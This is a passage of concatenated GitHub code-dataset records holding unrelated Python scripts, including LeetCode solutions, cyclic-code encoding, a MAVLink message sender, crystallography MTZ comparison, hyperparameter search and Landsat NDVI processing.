Z)\r\n\r\n\r\ndef _U_2_Umb(U: Matrix) -> Matrix:\r\n return Q_dag @ U @ Q\r\n\r\n\r\ndef _Umb_2_U(Umb: Matrix) -> Matrix:\r\n return Q @ Umb @ Q_dag\r\n\r\n\r\ndef _vectors_2_matrix(vectors: list) -> Matrix:\r\n M = vectors[0]\r\n for vec in vectors[1:]:\r\n M = M.row_join(vec)\r\n return M\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n U_test = Matrix([\r\n [1, 0, 0, 1],\r\n [0, 1, 1, 0],\r\n [0, 1, -1, 0],\r\n [1, 0, 0, -1]]\r\n ) / sqrt(2)\r\n\r\n Umb = _U_2_Umb(U_test)\r\n\r\n M = Umb.T @ Umb\r\n\r\n eigs = [(eigval, eigvec[0]) for (eigval, _, eigvec) in\r\n M.eigenvects()]\r\n\r\n for permutation in itertools.permutations(eigs):\r\n eigvals = [eig[0] for eig in permutation]\r\n eigvecs = [eig[1] for eig in permutation]\r\n O2 = _vectors_2_matrix(eigvecs).T\r\n if int(det(O2)) == 1:\r\n break\r\n\r\n l1, l2, l3, l4 = eigvals\r\n alpha = 1j / 4 * log(l1 * l2 / (l3 * l4))\r\n beta = 1j / 4 * log(l2 * l4 / (l1 * l3))\r\n gamma = 1j / 4 * log(l1 * l4 / (l2 * l3))\r\n","repo_name":"QuTech-Delft/cQASM-tools","sub_path":"Can1Can2/canDecomp_sympy.py","file_name":"canDecomp_sympy.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"4322764373","text":"'''\nA self-dividing number is a number that is divisible by every digit it contains.\n\nFor example, 128 is a self-dividing number because 128 % 1 == 0, 128 % 2 == 0, and 128 % 8 == 0.\nA self-dividing number is not allowed to contain the digit zero.\n\nGiven two integers left and right, return a list of all the self-dividing numbers in the range [left, right].\n\n \n\nExample 1:\n\nInput: left = 1, right = 22\nOutput: [1,2,3,4,5,6,7,8,9,11,12,15,22]\nExample 2:\n\nInput: left = 47, right = 85\nOutput: [48,55,66,77]\n \n\nConstraints:\n\n1 <= left <= right <= 104\n\n'''\nclass Solution:\n def selfDividingNumbers(self, left: int, right: int) -> List[int]:\n a=[]\n for i in range(left, right+1):\n s=str(i)\n if '0' in s:\n continue\n if sum(map(lambda b:i%int(b),s))==0:\n a.append(i)\n return a \n ","repo_name":"shreyansh-tyagi/leetcode-problem","sub_path":"self dividing numbers.py","file_name":"self dividing numbers.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"40704126740","text":"import os\nimport os.path as osp\n\nimport pandas as pd\n\ndef change_DataType(count, list_data):\n root_path = data_root_path\n for out_name in list_data:\n now_file = root_path + out_name\n checkfile = os.listdir(now_file)\n # print(checkfile)\n for inside_name in checkfile:\n now_data = now_file+'/'+inside_name\n checkdata = os.listdir(now_data)\n # print(checkdata)\n for i in range(len(checkdata)):\n if '.asc' in checkdata[i]:\n print(checkdata[i])\n name_split = checkdata[i].split('.')\n newpath = name_split[0]+\".txt\"\n # newroot = out_name + inside_name\n newroot = inside_name+\"_newFile\"\n path = \"data_wave/\"+out_name+\"/\"+newroot \n isExist = os.path.exists(path)\n \n if isExist == True:\n pass \n else:\n os.mkdir(path)\n \n print(f'checkdata : {checkdata[i]}')\n print(f'newpath : {newpath}')\n print(f'newroot : {newroot}')\n print('-'*10)\n raw_file = \"data_wave/\" + out_name +\"/\"+ inside_name+\"/\"\n file = path+\"/\"+name_split[0]+\".txt\"\n os.rename(raw_file+checkdata[i], file)\n \n #modify the file content\n file_path = file\n files = open(file_path)\n lines = files.readlines()\n \n del lines[0: 56]\n files.close()\n\n file_new = open(file_path, 'w+')\n file_new.writelines(lines)\n file_new.close()\n \n\n \n # name_split = checkdata[i].split('.')\n # print(name_split[0])\n # file_asc = name_split[0]+'.txt'` \n # pf = pd.read_csv(file_asc)\n # print(pf)\n # print(i,'-'*100)\n \n \n\n\n\ndata_root_path = 'data_wave/'\n# wavedata = data_root_path + 'data_wave'\ndatalist = os.listdir(data_root_path)\nprint(datalist)\nchange_DataType(len(datalist), datalist)\n","repo_name":"Mariiiiiio/2023-Research_Of_Soil_AI_model","sub_path":"files/changeType.py","file_name":"changeType.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30229594920","text":"# 4. Hacer un programa que pida al usuario que ingrese su nombre.\r\n# Si el nombre es \"Don Ramon\" o \"Doña Florinda\",\r\n# mostrar un mensaje que diga \"Es que no me tienen paciencia\".\r\n\r\nnombre = input(\"Ingrese su nombre: \")\r\n\r\ndon_ramon = \"Don Ramon\"\r\ndonia_florinda = \"Doña Florinda\"\r\npaciencia = \"Es que no me tienen paciencia\"\r\n\r\nif nombre == don_ramon or nombre == donia_florinda:\r\n print(paciencia)","repo_name":"mandrildev/ProgramacionDesdeCeroRepasoUno","sub_path":"ProgramacionDesdeCero/Clase03/Ejercicio04.py","file_name":"Ejercicio04.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37926793269","text":"from Dijkstra import dijkstra\n\nclass TestDijkstra:\n def setup_method(self):\n dic = {\n 'A': {'C': 2, 'E': 4},\n 'B': {'A': 6, 'D': 5},\n 'C': {'B': 4, 'E': 14},\n 'D': {'A': 3, 'C': 7},\n 'E': {'B': 6, 'D': 11}\n }\n\n return dic\n \n def test_dijkstra(self):\n graph = self.setup_method()\n first_var, second_var = dijkstra(graph, 'C')\n assert first_var == {'A': 10, 'B': 4, 'C': 0, 'D': 9, 'E': 14}\n assert second_var == {'B': 'C', 'E': 'C', 'A': 'B', 'D': 'B'}\n\n\ntest = TestDijkstra()\ntest.test_dijkstra()\n","repo_name":"kio7/UiT_code_examples","sub_path":"2nd year/Aicourse/Eksamen/test_Oppgave 9.py","file_name":"test_Oppgave 9.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3731252272","text":"import sys;\ninput = sys.stdin.readline;\n\nCHESSLEN = 8;\nchessBoard = [];\n\ndef countChessColor (startX, startY, startColor):\n currentColor = startColor;\n count = 0\n for i in range(CHESSLEN):\n for j in range(CHESSLEN):\n if chessBoard[startX+i][startY+j] == currentColor:\n count += 1;\n currentColor = 'B' if currentColor == 'W' else 'W';\n currentColor = 'B' if currentColor == 'W' else 'W';\n return count;\n\nn,m = map(int, input().split());\nfor _ in range(n):\n row = input().rstrip();\n chessBoard.append(row);\n\nresultArr = [];\nfor startX in range(n-CHESSLEN+1):\n for startY in range(m-CHESSLEN+1):\n resultArr.append(countChessColor(startX, startY, 'B'))\n resultArr.append(countChessColor(startX, startY, 'W'))\n\nprint(min(resultArr))","repo_name":"HamInKyou/python_codingTest_prac","sub_path":"backJoonStep/11/R_1018.py","file_name":"R_1018.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11719199207","text":"#!/usr/bin/python3\n\ndef add_elem(matrix, n, m, i, j):\n if i >= 0 and i <= n - 1 and j >= 0 and j <= m - 1:\n return matrix[i][j]\n return False\n\ndef minesweeper(matrix):\n n = len(matrix)\n m = len(matrix[0])\n counts = [[0 for i in range(m)] for j in range(n)]\n for i in range(n):\n for j in range(m):\n count = 0\n for p in range(i - 1, i + 2):\n for q in range(j - 1, j + 2):\n count += add_elem(matrix, n, m, p, q)\n counts[i][j] = count - matrix[i][j]\n return counts\n\n","repo_name":"lorosanu/online-coding","sub_path":"CodeFights/arcade/intro/24/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10077446544","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def rotateRight(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n if not head:\n return None\n \n # calculate actual shift\n length = self.getLength(head)\n shift = k % length\n if shift == 0:\n return head\n \n # pick off the shifted numbers, stick them to the front\n cur = head\n for i in range(length - shift - 1): # this is actually shifting to the left, just changed the range\n cur = cur.next\n \n newHead = cur.next\n cur.next = None\n \n cur = newHead\n while cur.next:\n cur = cur.next\n \n cur.next = head\n \n return newHead\n \n \n def getLength(self, head):\n length = 0\n while head:\n length += 1\n head = head.next\n return length","repo_name":"iechevarria/leetcode","sub_path":"061rotateList.py","file_name":"061rotateList.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35785157839","text":"import numpy as np\nimport itertools\n\nk1 = 4\nn1 = 7\ng1 = np.array([1, 0, 1, 1])#порождающий многочлен\n\nk2 = 9\nn2 = 15\ng2 = np.array([1, 0, 0, 1, 1, 1, 1])#порождающий многочлен\n\ndef Encode1(input):\n c = np.array([0, 0, 0, 0, 0, 0, 0])\n for i in range(0, k1):\n if input[i] == 1:\n c[i:i + 4] ^= g1\n return c\n\ndef Remainder1(input):\n r = input.copy()\n for i in range(n1 - 1, n1 - k1 - 1, -1):\n if r[i] == 1:\n r[i - (n1 - k1): i + 1] ^= g1\n return r\n\ndef WH(a): # расчёт веса Хэмминга\n wt = 0\n for i in range(int(len(a))):\n if (a[i]):\n wt += 1\n return wt\n\ndef Decode1(w):\n s = Remainder1(w)\n for i in range(n1):\n s1 = np.roll(s, i)\n ss =Remainder1(s1)\n if WH(ss)<=count_er:\n x = np.roll(ss, n1 - i)\n return x^w\n\ndef Encode2(input):\n c2 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n for j in range(0, k2):\n if input[j] == 1:\n c2[j:j + 7] ^= g2\n return c2\ndef Remainder2(input):\n r = input.copy()\n for i in range(n2 - 1, n2 - k2 - 1, -1):\n if r[i] == 1:\n r[i - (n2 - k2): i + 1] ^= g2\n return r\ndef Decode2(w):\n s = Remainder2(w)\n for i in range(n2):\n s1 = np.roll(s, i)\n ss = Remainder2(s1)\n for e in range(len(E)):\n if np.array_equal(E[e], ss):\n x = np.roll(ss, n2 - i)\n return x^w\n\n\nprint(\"ЧАСТЬ 1\")\n#входящая посл-ть\na = [1, 0, 0, 1]\nprint(a)\nA = Encode1(a)\nprint(\"Закодированное сообщение\", A)\nencod = A.copy()\n#кол-во ошибок от 1 до 3\nwhile True:\n count_er = int(input(\"Количество ошибок?: \"))\n if not 1 <= (count_er) <= 3:\n print(\"Попробуйте снова\")\n else:\n print(count_er)\n break\nmas_er2=[]\nz=0\n#последовательно вносим ошибки\nwhile z < count_er:\n i = int(input(\"В какой бит внести ошибку?: \"))\n if not 0 <= (i) < n1: #не выходим за границы сообщения\n print(\"Число не в диапазоне, попробуйте снова\")\n i = int(input(\"В какой бит внести ошибку?: \"))\n elif i in mas_er2:\n print(\"Число ранее было задано,попробуйте снова\")#е меняем один и тот же бит несколько раз\n i = int(input(\"В какой бит внести оши��ку?: \"))\n else:\n print(\"i =\", i)\n mas_er2.append(i)#запоминаем номер бита для проверки\n encod[i] = not encod[i]#еняем бит\n print(\"Cлово с ошибкой в бите\",i,\":\", encod)\n z+=1\nde = Decode1(encod)\nprint(de)\n\nprint(\"ЧАСТЬ 2\")\nE = []\ne1 = [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ne2 = [1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ne3 = [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ne4 = [1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\nE.append(e1)\nE.append(e2)\nE.append(e3)\nE.append(e4)\nfor i in range(1, 15):\n e1 = np.roll(e1, 1)\n e2 = np.roll(e2, 1)\n e3 = np.roll(e3, 1)\n e4 = np.roll(e4, 1)\n E.append(e1)\n E.append(e2)\n E.append(e3)\n E.append(e4)\n\nb = [1, 0, 0, 1, 0, 0, 0, 1, 1]\nprint(b)\nB = Encode2(b)\nprint(\"Закодированное сообщение\", B)\nencod1 = B.copy()\n#кол-во ошибок от 1 до 4\nwhile True:\n count_er1 = int(input(\"Количество ошибок?: \"))\n if not 1 <= (count_er1) <= 4:\n print(\"Попробуйте снова\")\n else:\n print(count_er1)\n break\nmas_er3=[]\nz1=0\n#последовательно вносим ошибки\nwhile z1 < count_er1:\n i = int(input(\"В какой бит внести ошибку?: \"))\n if not 0 <= (i) < n2: #не выходим за границы сообщения\n print(\"Число не в диапазоне, попробуйте снова\")\n i = int(input(\"В какой бит внести ошибку?: \"))\n elif i in mas_er3:\n print(\"Число ранее было задано,попробуйте снова\")#е меняем один и тот же бит несколько раз\n i = int(input(\"В какой бит внести ошибку?: \"))\n else:\n print(\"i =\", i)\n mas_er3.append(i)#запоминаем номер бита для проверки\n encod1[i] = not encod1[i]#еняем бит\n print(\"Cлово с ошибкой в бите\",i,\":\", encod1)\n z1+=1\nde1 = Decode2(encod1)\nprint(de1)\n","repo_name":"FuryCroissant/CodingTheory6","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8501797731","text":"\"\"\"\nThis script will:\n > Connect to the pixhawk\n > Send a custom VIDEO_MONITOR message\n > Wait for an acknowledgment before sending another message\n > Retransmit if no acknowledgment has been received\n\"\"\"\nfrom pymavlink import mavutil\nimport time\n\n# Set the dialect to receive the correct messages\nmavutil.set_dialect(\"video_monitor\")\n\n# Connect to the serial port of the pixhawk\npx4 = mavutil.mavlink_connection(\"/dev/ttyACM0\", baud=921600)\n\n# Waiting for a heartbeat\npx4.wait_heartbeat()\n\nprint(\"Heartbeat from system (system %u component %u)\" %(px4.target_system, px4.target_component))\n\ncounter = 0\nretransmit = False\nwhile True:\n#\tif not retransmit:\n # Send a custom message\n\tpx4.mav.video_monitor_send(\n\ttimestamp = int(time.time()*1e6),\n\tinfo = b'Salut!',\n\tlat = counter,\n\tlon = 231234567,\n\tno_people = 6,\n\tconfidence = 0.357)\n\tprint(\"The custom message with the number %u was sent!\" %(counter))\n\tretransmit = False\n # Wait for acknowledgment before sending new message\n\twhile True:\n # Wait for acknowledgment for a maximum of 3 seconds\n\t\tmsg = px4.recv_match(type='VIDEO_MONITOR', blocking=True, timeout=3.0)\n\t\ttry:\n # If acknowledgment has been received\n\t\t\tif msg.confidence == 1 and msg.lat == counter:\n\t\t\t\tbreak\n\t\texcept:\n # No acknowledgment received, going to retransmit message\n\t\t\tprint(\"No response, retransmission!!\")\n\t\t\tretransmit = True\n\t\t\tbreak\n\n\tcounter += 1\n\ttime.sleep(4.0)\n\n","repo_name":"DTT-DennisM/PX4","sub_path":"COMPANION_COMPUTER/mavlink/sendCustomMsg.py","file_name":"sendCustomMsg.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25159001480","text":"\"\"\"\nGive two mtz files (mtz_1 and mtz_2).\nReflections only in mtz_1 will be written as only_in_1.mtz. only_in_2.mtz will be written in the same way.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport mmtbx.utils\nimport iotbx.phil\nimport iotbx.reflection_file_utils\nimport iotbx.mtz\nfrom cctbx import miller\n\nmaster_params_str = \"\"\"\\\nhklin_1 = None\n .type=str\n .input_size = 160\n .short_caption = file name of mtz 1\nhklin_2 = None\n .type=str\n .input_size = 160\n .short_caption = file name of mtz 2\nlabels_1 = None\n .type=str\n .input_size = 160\n .short_caption = Data labels for mtz 1\nlabels_2 = None\n .type=str\n .input_size = 160\n .short_caption = Data labels for mtz 2\n\"\"\"\n\ndef get_data(mtzin, labels):\n mtzobj = iotbx.mtz.object(file_name=mtzin)\n selected = [x for x in mtzobj.as_miller_arrays() if x.info().label_string() == labels]\n\n if len(selected) < 1:\n print(mtzin, \"does not have\", labels)\n print(\" Possible labels:\", [x.info().label_string() for x in mtzobj.as_miller_arrays()])\n\n return selected[0]\n# get_data()\n\nif __name__ == \"__main__\":\n import sys\n\n parsed = iotbx.phil.parse(master_params_str, process_includes=True)\n\n\n processed_args = mmtbx.utils.process_command_line_args(args = sys.argv[1:],\n log = sys.stdout,\n master_params = parsed)\n\n working_phil = processed_args.params\n params = working_phil.extract()\n\n if params.hklin_1 is None and params.hklin_2 is None:\n if len(processed_args.reflection_file_names) != 2:\n print(\"Exactly two mtz files must be given.\")\n sys.exit(1)\n params.hklin_1, params.hklin_2 = processed_args.reflection_file_names\n\n working_phil = parsed.format(python_object=params)\n print(\"Parameters to compute maps:\")\n working_phil.show(out = sys.stdout, prefix=\" \")\n\n\n data_1 = get_data(params.hklin_1, params.labels_1)\n data_2 = get_data(params.hklin_2, params.labels_2)\n\n matches = miller.match_indices(data_1.indices(), data_2.indices())\n\n only_1 = data_1.select(matches.singles(0))\n only_2 = data_2.select(matches.singles(1))\n\n only_1.as_mtz_dataset(column_root_label=params.labels_1.split(\",\")[0]).mtz_object().write(\"only_in_1.mtz\")\n only_2.as_mtz_dataset(column_root_label=params.labels_2.split(\",\")[0]).mtz_object().write(\"only_in_2.mtz\")\n","repo_name":"keitaroyam/yamtbx","sub_path":"cctbx_progs/diff_hkls.py","file_name":"diff_hkls.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"67"} +{"seq_id":"40224300683","text":"import argparse\nimport numpy as np\nimport cv2\n\n\nclass textScrewCorrection:\n def __init__(self, image):\n self.image = image\n self.height = image.shape[0]\n self.width = image.shape[1]\n\n def __call__(self, *args, **kwargs):\n gray = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n coords = np.column_stack(np.where(thresh > 0))\n angle = cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n center = (self.width // 2, self.height // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated = cv2.warpAffine(self.image, M, (self.width, self.height), flags=cv2.INTER_CUBIC,\n borderMode=cv2.BORDER_REPLICATE)\n cv2.putText(rotated, \"Angle: {:.2f} degrees\".format(angle), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\n (0, 0, 255), 2)\n print(\"[INFO] angle: {:.3f}\".format(angle))\n cv2.imshow(\"Input\", self.image)\n cv2.imshow(\"Rotated\", rotated)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","repo_name":"Syun1208/eKYC-ID-Card-Detection","sub_path":"deploy/text_screw_correction.py","file_name":"text_screw_correction.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"72149972692","text":"# param_bounds = {\n# 'n_estimators': (20, 5, 1, 1, 50),\n# 'min_samples_split': (14, 12, 1, 1, 32),\n# 'max_features': (0.2, 0.15, 0.05, 0.05, 1)\n# }\nimport copy\nimport random\n\n\nclass ParamSearch(object):\n def __init__(self, model, scoring, seed=None):\n self.model = copy.copy(model)\n self.scoring = scoring\n if seed is None:\n self.seed = random.randint(1, 2**32 - 2)\n else:\n self.seed = seed\n self.all_scores = {}\n self.best_score = -1000\n self.best_params = 0\n self.new_scores_count = 1\n self.best_score_path = []\n self.best_param_path = []\n\n def search(self, param_bounds, verbose=False):\n step_sizes = []\n param_vals = []\n min_step_sizes = []\n lower_lims = []\n upper_lims = []\n param_names = param_bounds.keys()\n param_names.sort()\n self.param_names = param_names\n for p in param_names:\n p_bounds = param_bounds[p]\n if type(p_bounds) == dict:\n llim = p_bounds['lims'][0]\n ulim = p_bounds['lims'][1]\n if 'step_size' in p_bounds:\n step_size = p_bounds['step_size']\n else:\n step_size = (ulim - llim) / 2\n if 'min_step_size' in p_bounds:\n min_step_size = p_bounds['min_step_size']\n else:\n min_step_size = step_size\n if 'start' in p_bounds:\n start = p_bounds['start']\n else:\n start = (ulim + llim) / 2\n else:\n llim = p_bounds[0]\n ulim = p_bounds[1]\n step_size = (ulim - llim) / 2\n if len(p_bounds) > 2:\n min_step_size = p_bounds[2]\n else:\n min_step_size = step_size\n if len(p_bounds) > 3:\n start = p_bounds[3]\n else:\n start = (ulim + llim) / 2\n param_vals.append(start)\n step_sizes.append(step_size)\n lower_lims.append(llim)\n upper_lims.append(ulim)\n min_step_sizes.append(min_step_size)\n self.iter = 0\n if verbose:\n print(param_names)\n print(param_vals)\n print('\\tstep_size: %s' % step_sizes)\n while self.iter < 30:\n param_grid = {}\n for i in range(len(param_names)):\n p = param_names[i]\n if param_vals[i] < lower_lims[i]:\n param_vals[i] = lower_lims[i]\n if param_vals[i] > upper_lims[i]:\n param_vals[i] = upper_lims[i]\n if param_vals[i] - step_sizes[i] < lower_lims[i]:\n param_grid[p] = [lower_lims[i], param_vals[i], param_vals[i] + step_sizes[i]]\n elif param_vals[i] + step_sizes[i] > upper_lims[i]:\n param_grid[p] = [param_vals[i] - step_sizes[i], param_vals[i], upper_lims[i]]\n else:\n param_grid[p] = [\n param_vals[i] - step_sizes[i], param_vals[i], param_vals[i] + step_sizes[i]\n ]\n self.new_scores_count = 0\n res = self.process(param_grid, param_names=param_names)\n if verbose:\n print(param_names)\n print(param_vals)\n print('\\tstep_sizes: %s' % step_sizes)\n print('\\tnew_scores_count: %s' % self.new_scores_count)\n print('\\tbest_score: %s' % self.best_score)\n self.best_score_path.append(self.best_score)\n self.best_param_path.append(self.best_params)\n if self.new_scores_count == 0:\n # cut step_sizes in half\n step_sizes_old = step_sizes\n step_sizes = []\n for i in range(len(param_names)):\n if type(step_sizes_old[i]) == str:\n continue\n if type(step_sizes_old[i]) == int:\n new_step = step_sizes_old[i] / 2\n if type(step_sizes_old[i]) == float:\n new_step = step_sizes_old[i] / 2\n if new_step < min_step_sizes[i]:\n new_step = step_sizes_old[i]\n step_sizes.append(new_step)\n if step_sizes == step_sizes_old:\n break\n param_vals = self.best_params\n self.iter += 1\n res['param_names'] = param_names\n return res\n\n def get_score(self, params, param_names):\n if params in self.all_scores:\n return self.all_scores[params]\n else:\n self.new_scores_count += 1\n params_dict = dict(zip(param_names, params))\n self.model.clf.set_params(**params_dict)\n # select the correct proba\n proba = True\n if type(self.scoring) == str and self.scoring in ('accuracy'):\n proba = False\n if type(self.scoring) == dict:\n if self.scoring.values()[0].__name__ in ('accuracy_score'):\n proba = False\n eval_results = self.model.evaluate(scoring=self.scoring, proba=proba, seed=self.seed)\n score_type = eval_results.scores_.keys()[0]\n if score_type in ['brier']:\n score = -eval_results.scores_[score_type]['mean']\n else:\n score = eval_results.scores_[score_type]['mean']\n self.all_scores[params] = score\n return score\n\n def process(self, param_grid, param_values=(), param_names=None):\n param_grid = param_grid.copy()\n keys = param_grid.keys()\n keys.sort()\n k = keys[0]\n param_v = param_grid.pop(k)\n if len(param_grid) > 0:\n # process next batch\n params = []\n values = []\n for px in param_v:\n px2 = param_values + (px,)\n results = self.process(param_grid, param_values=px2, param_names=param_names)\n params.append(results['params'])\n values.append(results['values'])\n return {'params': params, 'values': values}\n else:\n params = []\n values = []\n for px in param_v:\n p_cell = param_values + (px,)\n params.append(p_cell)\n score = self.get_score(p_cell, param_names)\n if score > self.best_score:\n self.best_score = score\n self.best_params = p_cell\n values.append(score)\n return {'params': params, 'values': values}\n","repo_name":"nextbigsoundinc/eightball","sub_path":"eightball/param_optimization.py","file_name":"param_optimization.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"11680285591","text":"## functional code to process LANDSAT DATA into change pixels from 1995-2015 in wake county\n\nimport fiona\nimport rasterio\nfrom rasterio.mask import mask\nfrom rasterio.warp import calculate_default_transform, reproject, Resampling\nimport numpy\nimport os\nimport tarfile\nimport re\nimport glob\nimport errno\n\n# Allow division by zero\nnumpy.seterr(divide='ignore', invalid='ignore')\ndst_CRS = 'EPSG:2264'\n\n\ndef build_folders(directory):\n \"\"\"\n simple function to build directory structure for code\n :param directory: string path to data folder\n :return: list of directories\n \"\"\"\n output_NDVI = os.path.join(directory, 'NDVI')\n max_NDVI = os.path.join(output_NDVI, 'MAX_NDVI')\n change = os.path.join(directory, 'CHANGE')\n folders = [output_NDVI, max_NDVI, change]\n for folder in folders:\n if not os.path.exists(folder):\n try:\n os.mkdir(folder)\n except OSError as oserr:\n if oserr.errno != errno.EEXIST:\n raise\n\n return folders\n\n\ndef reproj_raster(raster):\n # unused function, could be valuable if a different projection is prefered,\n # currently the data remain in the CRS downloaded from Earth Explorer\n \"\"\"\n function to reporject a raster to state plane feet\n :param raster: raster to be projected\n :return: projected raster file path\n \"\"\"\n path, file = os.path.split(raster)\n out_raster = os.path.join(path, file[:-4] + '.NC_SPF.tif')\n with rasterio.open(raster) as src:\n transform, width, height = calculate_default_transform(\n src.crs, dst_CRS, src.width, src.height, *src.bounds)\n kwargs = src.meta.copy()\n kwargs.update(\n crs=dst_CRS,\n transform=transform,\n width=width,\n height=height)\n with rasterio.open(out_raster, 'w', **kwargs) as dst:\n for i in range(1, src.count + 1):\n reproject(\n source=rasterio.band(src, i),\n destination=rasterio.band(dst, i),\n src_transform=src.transform,\n src_crs=src.crs,\n dst_transform=transform,\n dst_crs=dst_CRS,\n resampling=Resampling.nearest)\n return out_raster\n\n\ndef process_VI(ref, abs, meta):\n \"\"\"\n simple function to process the NIR and RED bands to NDVI, generalized enough to process other band\n combinations as well\n :param ref: reflectance band\n :param abs: absorption band\n :param meta: metadata about incoming rasters\n :return: vi array and updated metadata about created raster\n \"\"\"\n # Calculate VI\n ndvi = (ref.astype(float) - abs.astype(float)) / (ref + abs)\n ndvi[ndvi > 1] = 1\n ndvi[ndvi < -1] = -1\n kwargs = meta\n # Update kwargs (change in data type)\n kwargs.update(\n driver='GTiff',\n dtype=rasterio.float32,\n count=1)\n return ndvi, kwargs\n\n\ndef calc_ndvi(working_dir, output_dir):\n \"\"\"\n calculate NDVI value for Landsat 5 and Landsat 8 while only opening the bands needed from the archive\n :param working_dir:\n :param output_dir:\n :return: none\n \"\"\"\n # create a list of only the tar files in the working directory\n satellite_files = glob.glob(working_dir + '\\*.tar')\n # loop over tar files and calculate NDVI from appropriate bands\n for file in satellite_files:\n name, ext = os.path.splitext(os.path.basename(file))\n new_folder = os.path.join(working_dir, name)\n if not os.path.exists(new_folder):\n os.mkdir(new_folder)\n\n # set up regex to grab appropriate files for satellite and place unzip them for use\n parts = os.path.basename(file).split(sep='_')\n if parts[0] == 'LT05':\n bands_grep = re.compile(\".*_(SRB3|SRB4)\\.tif\")\n if parts[0] == 'LC08':\n bands_grep = re.compile(\".*_(SRB4|SRB5)\\.tif\")\n tar = tarfile.open(file)\n file_list = tar.getnames()\n bands = filter(lambda x: bands_grep.search(x), file_list)\n data = []\n for item in bands:\n tar.extract(item, path=new_folder)\n data.append(os.path.join(new_folder, item))\n\n # read in data for red(absorption) and nir(reflectance) bands\n with rasterio.open(data[0]) as src:\n absorb_band = src.read(1)\n meta = src.meta\n with rasterio.open(data[1]) as src:\n refl_band = src.read(1)\n\n # Calculate NDVI\n data, kwargs = process(refl_band, absorb_band, meta)\n ndvi_raster = os.path.join(output_dir, name + '_NDVI.tif')\n with rasterio.open(ndvi_raster, 'w', **kwargs) as dst:\n dst.write_band(1, data.astype(rasterio.float32))\n\n\ndef calc_max_ndvi(NDVI_folder, output_folder):\n \"\"\"\n collect all NDVI rasters created for a given year and stack into N dimensional array, then\n write out the MAX value per pixel to a raster for that year\n :param NDVI_folder: folder containing NDVI rasters\n :param output_folder: output directory\n :return: none\n \"\"\"\n ndvi_tifs = glob.glob(NDVI_folder + '\\*.tif')\n # group tifs into year chunks using a dictionary key\n # for years and list of rasters for that year as values\n years = {}\n for tif in ndvi_tifs:\n file = os.path.basename(tif)\n year = file[15:19]\n if year not in years:\n years[year] = [tif]\n else:\n years[year].append(tif)\n\n # loop over each dictionary items and determine max value for each pixel\n for year, tifs in years.items():\n with rasterio.open(tifs[0]) as src:\n kwargs = src.meta\n kwargs.update(count=len(tifs))\n with rasterio.open(os.path.join(output_folder, 'stack.tif'.format(year)), 'w+', **kwargs) as stack:\n for id, tif in enumerate(tifs, start=1):\n with rasterio.open(tif) as src:\n stack.write_band(id, src.read(1))\n stacked_rasters = stack.read()\n # determine max value per pixel and write to final raster\n kwargs.update(count=1)\n with rasterio.open(os.path.join(output_folder, 'NDVI_MAX_{}.tif'.format(year)), 'w', **kwargs) as dst:\n max_ndvi = numpy.max(stacked_rasters, axis=0)\n dst.write_band(1, max_ndvi)\n\n\ndef change_analysis(max_ndvi_dir, output_dir):\n \"\"\"\n creates a list of all max ndvi tifs and processes them into change rasters\n :param max_ndvi_dir: directory where max NDVI rasters have been created\n :param output_dir: output directory\n :return:\n \"\"\"\n # collect all MAX_NDVI rasters into a list and sort them in descending order\n max_ndvi_tifs = glob.glob(max_ndvi_dir + '\\\\NDVI_MAX_*.tif')\n sorted = max_ndvi_tifs.copy()\n sorted.reverse()\n # define a masking geometry of the county for clipping the final result\n with 